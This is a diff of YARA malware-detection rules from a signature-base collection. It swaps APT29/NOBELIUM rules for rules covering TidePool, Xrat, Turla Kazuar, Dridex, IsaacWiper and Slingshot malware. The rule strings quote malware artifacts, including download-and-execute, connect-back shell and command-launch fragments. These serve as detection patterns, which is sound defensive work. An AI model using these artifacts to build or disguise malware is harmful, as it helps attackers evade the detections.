 	meta:
-		description = "Detects EnvyScout deobfuscator code as used by NOBELIUM group"
+		description = "Detects TidePool malware mentioned in Ke3chang report by Palo Alto Networks"
 		author = "Florian Roth (Nextron Systems)"
-		id = "42739aad-a88a-545b-8256-1f727c79c4f8"
-		date = "2021-05-29"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L56-L67"
+		id = "eec12fd7-f5f8-5bee-98e0-2111766deb55"
+		date = "2016-05-24"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/m2CXWR"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_tidepool.yar#L8-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ad8a7bb5a1d2065e3a573842fb37ee3c63b7695c18840f0c26d32e6ae3d99c6c"
+		logic_hash = "759920ed7c9320e8412ed0644b28922a545b04f7549f0da6d6c67d6af8a7af3e"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba"
+		hash2 = "67c4e8ab0f12fae7b4aeb66f7e59e286bd98d3a77e5a291e8d58b3cfbc1514ed"
+		hash3 = "2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18"
+		hash4 = "38f2c86041e0446730479cdb9c530298c0c4936722975c4e7446544fd6dcac9f"
+		hash5 = "9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba"
 
 	strings:
-		$x1 = "[i].charCodeAt(0) ^ 2);}"
+		$x1 = "Content-Disposition: form-data; name=\"m1.jpg\"" fullword ascii
+		$x2 = "C:\\PROGRA~2\\IEHelper\\mshtml.dll" fullword wide
+		$x3 = "C:\\DOCUME~1\\ALLUSE~1\\IEHelper\\mshtml.dll" fullword wide
+		$x4 = "IEComDll.dat" fullword ascii
+		$s1 = "Content-Type: multipart/form-data; boundary=----=_Part_%x" fullword wide
+		$s2 = "C:\\Windows\\System32\\rundll32.exe" fullword wide
+		$s3 = "network.proxy.socks_port\", " fullword ascii
 
 	condition:
-		filesize < 5000KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) ) ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_JS_Envyscout_May21_2 : FILE
+rule SIGNATURE_BASE_Xrat_1 : FILE
 {
 	meta:
-		description = "Detects EnvyScout deobfuscator code as used by NOBELIUM group"
+		description = "Detects Patchwork malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d5cf3365-fe24-533a-a678-b5b6d4d99997"
-		date = "2021-05-29"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L69-L83"
+		id = "170c926a-2020-5269-85b8-6fe9ad28ef76"
+		date = "2017-12-11"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/Pg3P4W"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_xrat.yar#L12-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6f5c50b340d628559799897a2ba79add7d126e3ecb2daeb365bc15d64796ccd2"
+		logic_hash = "032c5af4f34959783102977543d2caf6199b8d1880a64797882f591e36c64d69"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b"
+		hash2 = "f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a"
 
 	strings:
-		$s1 = "saveAs(blob, " ascii
-		$s2 = ".iso\");" ascii
-		$s3 = "application/x-cd-image" ascii
-		$s4 = ".indexOf(\"Win\")!=-1" ascii
+		$x1 = "\" -CHECK & PING -n 2 127.0.0.1 & EXIT" fullword wide
+		$x2 = "xClient.Core.Elevation" fullword ascii
+		$x3 = ">> Welcome to MAX-Shell :Session created" fullword wide
+		$x4 = "xClient.Properties.Resources.resources" fullword ascii
+		$x5 = "<description>My UAC Compatible application</description>" fullword ascii
+		$s1 = "ping -n 20 localhost > nul" fullword wide
+		$s2 = "DownloadAndExecute" fullword ascii
+		$s3 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36" fullword wide
+		$s4 = "Client.exe" fullword ascii
+		$s5 = "Microsoft -Defender" fullword wide
+		$s6 = "Microsoft- Defender" fullword wide
+		$s7 = "set_RunHidden" fullword ascii
 
 	condition:
-		filesize < 5000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_LNK_NV_Link_May21_2 : FILE
+
+rule SIGNATURE_BASE_Apt_RU_Turla_Kazuar_Debugview_Pefeatures : FILE
 {
 	meta:
-		description = "Detects NV Link as used by NOBELIUM group"
-		author = "Florian Roth (Nextron Systems)"
-		id = "52c2caf9-13df-5614-9c9e-afcd76ec77f9"
-		date = "2021-05-29"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L85-L97"
+		description = "Turla mimicking SysInternals Tools- peFeatures"
+		author = "JAG-S"
+		id = "0a1675c0-8645-5288-9ef6-e68ffbfe0c3b"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://www.epicturla.com/blog/sysinturla"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_kazuar.yar#L15-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5eee9df368da3fc98c00a0f8c65a7f3bd5b812342082be58054b272b5bb03455"
-		score = 75
+		logic_hash = "10c2e47e5c1885c7dc19d1fb7933c9b15911cbe4c6fba99b7f763738ae934126"
+		score = 85
 		quality = 85
 		tags = "FILE"
-
-	strings:
-		$s1 = "RegisterOCX BOOM" ascii wide
-		$s2 = "cmd.exe /c start BOOM.exe" ascii wide
+		version = "2.0"
+		hash1 = "1749c96cc1a4beb9ad4d6e037e40902fac31042fa40152f1d3794f49ed1a2b5c"
+		hash2 = "44cc7f6c2b664f15b499c7d07c78c110861d2cc82787ddaad28a5af8efc3daac"
 
 	condition:
-		filesize < 5000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and ( pe.version_info [ "LegalCopyright" ] == "Test Copyright" and ( ( pe.version_info [ "ProductName" ] == "Sysinternals DebugView" and pe.version_info [ "Description" ] == "Sysinternals DebugView" ) or ( pe.version_info [ "FileVersion" ] == "4.80.0.0" and pe.version_info [ "Comments" ] == "Sysinternals DebugView" ) or ( pe.version_info [ "OriginalName" ] contains "DebugView.exe" and pe.version_info [ "InternalName" ] contains "DebugView.exe" ) or ( pe.version_info [ "OriginalName" ] == "Agent.exe" and pe.version_info [ "InternalName" ] == "Agent.exe" ) ) )
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_LNK_Samples_May21_1 : FILE
+rule SIGNATURE_BASE_APT_MAL_RU_Turla_Kazuar_May20_1 : FILE
 {
 	meta:
-		description = "Detects link file characteristics as described in APT29 NOBELIUM report"
+		description = "Detects Turla Kazuar malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c807ab5a-f66a-5622-81b1-6e69b6df8446"
-		date = "2021-05-27"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L99-L128"
+		id = "cd0d1fa2-5303-55f8-90a7-4a699ec79230"
+		date = "2020-05-28"
+		modified = "2023-12-05"
+		reference = "https://www.epicturla.com/blog/sysinturla"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_kazuar.yar#L61-L81"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "32d76bb1af76f0fc2afb76d9726bc8ec99c4be34c9d46cebab7356d8c68af11c"
-		score = 85
+		logic_hash = "547ed3cd88057ab91a0804ecf515eacca04fcf6e490aed1ee0f6a26c3d6b8268"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "24caf54e7c3fe308444093f7ac64d6d520c8f44ea4251e09e24931bdb72f5548"
+		hash1 = "1749c96cc1a4beb9ad4d6e037e40902fac31042fa40152f1d3794f49ed1a2b5c"
+		hash2 = "1fca5f41211c800830c5f5c3e355d31a05e4c702401a61f11e25387e25eeb7fa"
+		hash3 = "2d8151dabf891cf743e67c6f9765ee79884d024b10d265119873b0967a09b20f"
+		hash4 = "44cc7f6c2b664f15b499c7d07c78c110861d2cc82787ddaad28a5af8efc3daac"
 
 	strings:
-		$a1 = "rundll32.exe" wide
-		$sa1 = "IMGMountingService.dll" wide
-		$sa2 = "MountImgHelper" wide
-		$sb1 = "diassvcs.dll" wide
-		$sb2 = "InitializeComponent" wide
-		$sc1 = "MsDiskMountService.dll" wide
-		$sc2 = "DiskDriveIni" wide
-		$sd1 = "GraphicalComponent.dll" wide
-		$sd2 = "VisualServiceComponent" wide
-		$se1 = "data/mstu.dll,MicrosoftUpdateService" wide
+		$s1 = "Sysinternals" ascii fullword
+		$s2 = "Test Copyright" wide fullword
+		$op1 = { 0d 01 00 08 34 2e 38 30 2e 30 2e 30 00 00 13 01 }
 
 	condition:
-		uint16( 0 ) == 0x004c and filesize < 4KB and $a1 and ( all of ( $sa* ) or all of ( $sb* ) or all of ( $sc* ) or all of ( $sd* ) or all of ( $se* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Boombox_May21_1 : FILE
+rule SIGNATURE_BASE_EXPL_Manageengine_CVE_2022_47966_Jan23_1
 {
 	meta:
-		description = "Detects BoomBox malware as described in APT29 NOBELIUM report"
-		author = "Florian Roth"
-		id = "1a14dcf7-81be-5a74-a530-caf6268d1976"
-		date = "2021-05-27"
-		modified = "2025-03-20"
-		reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L130-L161"
+		description = "Detects indicators of exploitation of ManageEngine vulnerability as described by Horizon3"
+		author = "Florian Roth (Nextron Systems)"
+		id = "07535b9c-8611-5a46-bcd7-f94070de2aea"
+		date = "2023-01-13"
+		modified = "2023-12-05"
+		reference = "https://www.horizon3.ai/manageengine-cve-2022-47966-iocs/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_manageengine_jan23.yar#L2-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8199f309478e8ed3f03f75e7574a3e9bce09b4423bd7eb08bb5bff03af2b7c27"
-		logic_hash = "034ea34eb34ea6de0c65b9a7fc9d16f108ef34cd75294b022371ac17789c3830"
-		score = 85
+		logic_hash = "a62064e4f12632ba6c14cbbd9369ee919536334f19021a177c126b5dff7e568c"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$a1 = "]::FromBase64String($" ascii wide
-		$xa1 = "123do3y4r378o5t34onf7t3o573tfo73" ascii wide fullword
-		$xa2 = "1233t04p7jn3n4rg" ascii wide fullword
-		$s1 = "\\Release\\BOOM.pdb" ascii
-		$s2 = "/files/upload" ascii
-		$s3 = "/tmp/readme.pdf" ascii fullword
-		$s4 = "/new/{0}" ascii fullword
-		$s5 = "(&(objectClass=user)(objectCategory=person))"
+		$ = "]: com.adventnet.authentication.saml.SamlException: Signature validation failed. SAML Response rejected|"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or 1 of ( $a* ) ) and ( 1 of ( $x* ) or 3 of ( $s* ) )
+		1 of them
 }
 
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Boombox_PDF_Masq_May21_1 : FILE
+rule SIGNATURE_BASE_Crime_Win32_Dridex_Socks5_Mod
 {
 	meta:
-		description = "Detects PDF documents as used by BoomBox as described in APT29 NOBELIUM report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bdfb9600-edda-5c8c-ab23-14fb71c8e647"
-		date = "2021-05-27"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L163-L182"
+		description = "Detects Dridex socks5 module"
+		author = "@VK_Intel"
+		id = "cee256b1-ad80-55dd-bbd3-0d3f7bc49664"
+		date = "2020-04-06"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/VK_Intel/status/1247058432223477760"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_evilcorp_dridex_banker.yar#L8-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8f1514648b2b797adfe3f8f5acb577c26707dfe1da942c9634be3d88a180a407"
-		score = 70
-		quality = 35
-		tags = "FILE"
+		logic_hash = "5ca09e9c7d94e949e453d1bb69b566c12b253579cbcae700929d4f517df35a0a"
+		score = 75
+		quality = 85
+		tags = ""
 
 	strings:
-		$ah1 = { 25 50 44 46 2d 31 2e 33 0a 25 }
-		$af1 = { 0a 25 25 45 4f 46 0a }
-		$fp1 = "endobj" ascii
-		$fp2 = "endstream" ascii
-		$fp3 = { 20 6F 62 6A 0A }
+		$s0 = "socks5_2_x32.dll"
+		$s1 = "socks5_2_x64.dll"
 
 	condition:
-		$ah1 at 0 and $af1 at ( filesize -7 ) and filesize < 100KB and not 1 of ( $fp* ) and math.entropy ( 16 , filesize ) > 7
+		any of ( $s* ) and pe.exports ( "start" )
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Nativezone_Loader_May21_1 : FILE
+
+rule SIGNATURE_BASE_Crime_Win32_Hvnc_Banker_Gen
 {
 	meta:
-		description = "Detects NativeZone loader as described in APT29 NOBELIUM report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "02d9257d-f439-5071-96b0-a973b088e329"
-		date = "2021-05-27"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L184-L204"
+		description = "Detects malware banker hidden VNC"
+		author = "@VK_Intel"
+		id = "5e13f4a9-2231-524f-82b2-fbc6d6a43b6f"
+		date = "2020-04-06"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/VK_Intel/status/1247058432223477760"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_evilcorp_dridex_banker.yar#L22-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a02fd6fcd7423781bbd2e4458bd61d28e16a5b1a73b1682e63db5c86d53c7da4"
-		score = 85
+		logic_hash = "b01af685c3826834aadaf4eac1f1d8171db288a2efa7b769d8122421f7af8d7e"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "136f4083b67bc8dc999eb15bb83042aeb01791fc0b20b5683af6b4ddcf0bbc7d"
-
-	strings:
-		$s1 = "\\SystemCertificates\\Lib\\CertPKIProvider.dll" ascii
-		$s2 = "rundll32.exe %s %s" ascii fullword
-		$s3 = "eglGetConfigs" ascii fullword
-		$op1 = { 80 3d 74 8c 01 10 00 0f 85 96 00 00 00 33 c0 40 b9 6c 8c 01 10 87 01 33 db 89 5d fc }
-		$op2 = { 8b 46 18 e9 30 ff ff ff 90 87 2f 00 10 90 2f 00 10 }
-		$op3 = { e8 14 dd ff ff 8b f1 80 3d 74 8c 01 10 00 0f 85 96 00 00 00 33 c0 40 b9 6c 8c 01 10 87 01 }
+		tags = ""
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 3 of them or 4 of them
+		pe.exports( "VncStartServer" ) and pe.exports ( "VncStopServer" )
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Boombox_May21_2 : FILE
+
+rule SIGNATURE_BASE_MAL_WIPER_Isaacwiper_Mar22_1 : FILE
 {
 	meta:
-		description = "Detects BoomBox malware used by APT29 / NOBELIUM"
+		description = "Detects IsaacWiper malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a4144c00-48b2-5520-b773-5d0a5de95fb1"
-		date = "2021-05-29"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L206-L234"
+		id = "97d8d8dd-db65-5156-8f97-56c620cf2d56"
+		date = "2022-03-03"
+		modified = "2023-12-05"
+		reference = "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ua_isaacwiper.yar#L3-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2a3829e704af2464639d07e8e7952669281e20cf2a7ac487d5d1eee021d08b35"
-		score = 75
+		logic_hash = "6fe7d1536db5fc30c9b4a171be66993fc69e6a1d96dae00be4170bdb4a53afb8"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		hash1 = "0acb884f2f4cfa75b726cb8290b20328c8ddbcd49f95a1d761b7d131b95bafec"
-		hash2 = "8199f309478e8ed3f03f75e7574a3e9bce09b4423bd7eb08bb5bff03af2b7c27"
-		hash3 = "cf1d992f776421f72eabc31d5afc2f2067ae856f1c9c1d6dc643a67cb9349d8c"
+		hash1 = "13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033"
+		hash2 = "7bcd4ec18fc4a56db30e0aaebd44e2988f98f7b5d8c14f6689f650b4f11e16c0"
 
 	strings:
-		$x1 = "\\Microsoft\\NativeCache\\NativeCacheSvc.dll" wide
-		$x2 = "\\NativeCacheSvc.dll _configNativeCache" wide
-		$a1 = "/content.dropboxapi.com" wide fullword
-		$s1 = "rundll32.exe {0} {1}" wide fullword
-		$s2 = "\\\\CertPKIProvider.dll" wide
-		$s3 = "/tmp/readme.pdf" wide
-		$s4 = "temp/[^\"]*)\"" wide fullword
-		$op1 = { 00 78 00 2d 00 41 00 50 00 49 00 2d 00 41 00 72 00 67 00 01 2f 4f 00 72 00 }
-		$op2 = { 25 72 98 01 00 70 6f 34 00 00 0a 25 6f 35 00 00 0a 72 71 02 00 70 72 }
-		$op3 = { 4d 05 20 00 12 80 91 04 20 01 08 0e 04 20 00 12 }
+		$s1 = "C:\\ProgramData\\log.txt" wide fullword
+		$s2 = "Cleaner.dll" ascii fullword
+		$s3 = "-- system logical drive: " wide fullword
+		$s4 = "-- FAILED" wide fullword
+		$op1 = { 8b f1 80 3d b0 66 03 10 00 0f 85 96 00 00 00 33 c0 40 b9 a8 66 03 10 87 01 33 db }
+		$op2 = { 8b 40 04 2b c2 c1 f8 02 3b c8 74 34 68 a2 c8 01 10 2b c1 6a 04 }
+		$op3 = { 8d 4d f4 ff 75 08 e8 12 ff ff ff 68 88 39 03 10 8d 45 f4 50 e8 2d 1d 00 00 cc }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and 3 of them or 4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( pe.imphash ( ) == "a4b162717c197e11b76a4d9bc58ea25d" or 3 of them )
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Malware_May21_2 : FILE
+rule SIGNATURE_BASE_Slingshot_APT_Spork_Downloader : FILE
 {
 	meta:
-		description = "Detects malware used by APT29 / NOBELIUM"
+		description = "Detects malware from Slingshot APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b1462b4b-227f-5aeb-92ea-bda6a86831c7"
-		date = "2021-05-29"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L236-L252"
+		id = "21e02f78-40d8-5b56-b747-3f2a7a692259"
+		date = "2018-03-09"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/apt-slingshot/84312/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_slingshot.yar#L11-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "18a52f5fd71455b8564d4b485c233dd358a304bfddc5e6fb604b8e5a2a1949a3"
+		logic_hash = "5dac11c595d838cb6b5f1e548307ea79d119c890c54e954453cf1a264e1d14ed"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "292e5b0a12fea4ff3fc02e1f98b7a370f88152ce71fe62670dd2f5edfaab2ff8"
-		hash2 = "776014a63bf3cc7034bd5b6a9c36c75a930b59182fe232535bb7a305e539967b"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$op1 = { 48 03 c8 42 0f b6 04 21 88 03 0f b6 43 01 8b c8 83 e0 0f 48 83 e1 f0 48 03 c8 }
-		$op2 = { 48 03 c8 42 0f b6 04 21 88 43 01 41 0f b6 c7 8b c8 83 e0 0f 48 83 e1 f0 48 03 c8 }
-		$op3 = { 45 0f b6 43 ff 41 8b c2 99 44 88 03 41 0f b6 2b 83 e2 03 03 c2 40 88 6b 01 }
+		$s1 = "Usage: spork -c IP:PORT" fullword ascii wide
+		$s2 = "connect-back IP address and port number"
 
 	condition:
-		filesize < 2200KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Stageless_Loader_May21_2 : FILE
+rule SIGNATURE_BASE_Slingshot_APT_Minisling : FILE
 {
 	meta:
-		description = "Detects stageless loader as used by APT29 / NOBELIUM"
+		description = "Detects malware from Slingshot APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7b83d327-52fc-5401-ae35-00f6b825678a"
-		date = "2021-05-29"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L254-L276"
+		id = "99f9d5a1-b29f-52f7-9aec-02df4a51a756"
+		date = "2018-03-09"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/apt-slingshot/84312/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_slingshot.yar#L26-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "850f6a1ad342fd5e4bb29c7bf90a032ddd8ac9d2eac5ffcbedf43e4d04b178f5"
+		logic_hash = "7d370271fea6c607c051eb49681600b4f59878c2fd2d43d71194bddda78d7b09"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "a4f1f09a2b9bc87de90891da6c0fca28e2f88fd67034648060cef9862af9a3bf"
-		hash2 = "c4ff632696ec6e406388e1d42421b3cd3b5f79dcb2df67e2022d961d5f5a9e78"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "DLL_stageless.dll" ascii fullword
-		$s1 = "c:\\users\\devuser\\documents" ascii fullword nocase
-		$s2 = "VisualServiceComponent" ascii fullword
-		$s3 = "CheckUpdteFrameJavaCurrentVersion" ascii fullword
-		$op1 = { a3 d? 6? 04 10 ff d6 33 05 00 ?0 0? 10 68 d8 d4 00 10 57 a3 d? 6? 04 10 ff d6 33 05 00 ?0 0? 10 }
-		$op2 = { ff d6 33 05 00 ?0 0? 10 68 d8 d4 00 10 57 a3 d? 6? 04 10 ff d6 33 05 00 ?0 0? 10 68 e8 d4 00 10 }
+		$s1 = "{6D29520B-F138-442e-B29F-A4E7140F33DE}" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and 2 of them or 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Malware_May21_3 : FILE
+rule SIGNATURE_BASE_Slingshot_APT_Ring0_Loader : FILE
 {
 	meta:
-		description = "Detects malware used by APT29 / NOBELIUM"
+		description = "Detects malware from Slingshot APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "89cb6884-4242-5b5a-b0ac-b31041dd261c"
-		date = "2021-05-29"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L278-L300"
+		id = "b5301a45-a4ec-5e56-a990-bc6300ee6365"
+		date = "2018-03-09"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/apt-slingshot/84312/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_slingshot.yar#L40-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "472acd1d6daf3480de59ecd3fa038d644e339dcc979cf7e56617eadc6cb32dc5"
+		logic_hash = "c231158e44de01585e9fb4bd9768b388016972e2026e049070cdc6cd35362609"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "2a352380d61e89c89f03f4008044241a38751284995d000c73acf9cad38b989e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Win32Project1.dll" ascii fullword
-		$op1 = { 59 c3 6a 08 68 70 5e 01 10 e8 d2 8c ff ff 8b 7d 08 8b c7 c1 f8 05 }
-		$op2 = { 8d 4d f0 e8 c4 12 00 00 68 64 5b 01 10 8d 45 f0 c7 45 f0 6c 01 01 10 50 e8 ea 13 00 00 cc }
-		$op4 = { 40 c3 8b 65 e8 e8 a6 86 ff ff cc 6a 0c 68 88 60 01 10 e8 b0 4d ff ff }
-		$xc1 = { 25 73 25 73 00 00 00 00 2F 65 2C 20 00 00 00 00
-               43 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00
-               77 00 73 00 5C 00 65 00 78 00 70 00 6C 00 6F 00
-               72 00 65 00 72 00 2E 00 65 00 78 00 65 }
+		$s1 = " -> Missing element in DataDir -- cannot install" ascii
+		$s2 = " -> Primary loader not present in the DataDir" ascii
+		$s3 = "\\\\.\\amxpci" fullword ascii
+		$s4 = " -> [Goad] ERROR in CreateFile:" fullword ascii
+		$s5 = "\\\\.\\Sandra" fullword ascii
+		$s6 = " -> [Sandra] RingZeroCode" fullword ascii
+		$s7 = " -> [Sandra] Value from IOCTL_RDMSR:" fullword ascii
 
 	condition:
-		filesize < 3000KB and ( $xc1 or 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Malware_May21_4 : FILE
+
+rule SIGNATURE_BASE_Slingshot_APT_Malware_1 : FILE
 {
 	meta:
-		description = "Detects malware used by APT29 / NOBELIUM"
+		description = "Detects malware from Slingshot APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "56193475-52b4-5720-abc5-72249e2a0c37"
-		date = "2021-05-29"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
